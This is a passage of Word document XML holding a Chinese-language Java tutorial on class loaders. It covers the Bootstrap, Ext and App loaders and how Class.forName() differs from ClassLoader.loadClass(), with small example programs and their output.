          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bootstrap Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（启动类加载器）是最顶级的类加载器了，其父加载器为</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>null.</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 </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四、类加载器的获取</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 </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很容易，看下面例子</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public class HelloWorld { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        public static void main(String[] args) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                HelloWorld hello = new HelloWorld(); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                Class c = hello.getClass(); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                ClassLoader loader = c.getClassLoader(); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>                System.out.println(loader); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                System.out.println(loader.getParent()); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                System.out.println(loader.getParent().getParent()); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        } </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</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 </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打印结果：</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sun.misc.Launcher$AppClassLoader@19821f </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>sun.misc.Launcher$ExtClassLoader@addbf1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>null </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Process finished with exit code 0</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 </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从上面的结果可以看出，并没有获取到</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ExtClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的父</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，原因是</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bootstrap Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（启动类加载器）是用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>语言实现的，找不到一个确定的返回父</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的方式，于是就返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</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 </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五、类的加载</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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067787" w:rsidRPr="00D84503" w:rsidRDefault="00067787" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类加载有三种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067787" w:rsidRPr="00D84503" w:rsidRDefault="00067787" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、命令行启动应用时候由</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>初始化加载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067787" w:rsidRPr="00D84503" w:rsidRDefault="00067787" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class.forName()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法动态加载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067787" w:rsidRPr="00D84503" w:rsidRDefault="00067787" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader.loadClass()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84503">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法动态加载</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 </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三种方式区别比较大，看个例子就明白了：</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public class HelloWorld { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        public static void main(String[] args) throws ClassNotFoundException { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                ClassLoader loader = HelloWorld.class.getClassLoader(); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                System.out.println(loader); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                //</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader.loadClass()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来加载类，不会执行初始化块</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                loader.loadClass("Test2"); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                //</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class.forName()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来加载类，默认会执行初始化块</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>//                Class.forName("Test2"); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                //</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class.forName()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来加载类，并指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，初始化时不执行静态块</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>//                Class.forName("Test2", false, loader); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        } </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</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 </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public class Test2 { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        static { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                System.out.println("</w:t>
      </w:r>
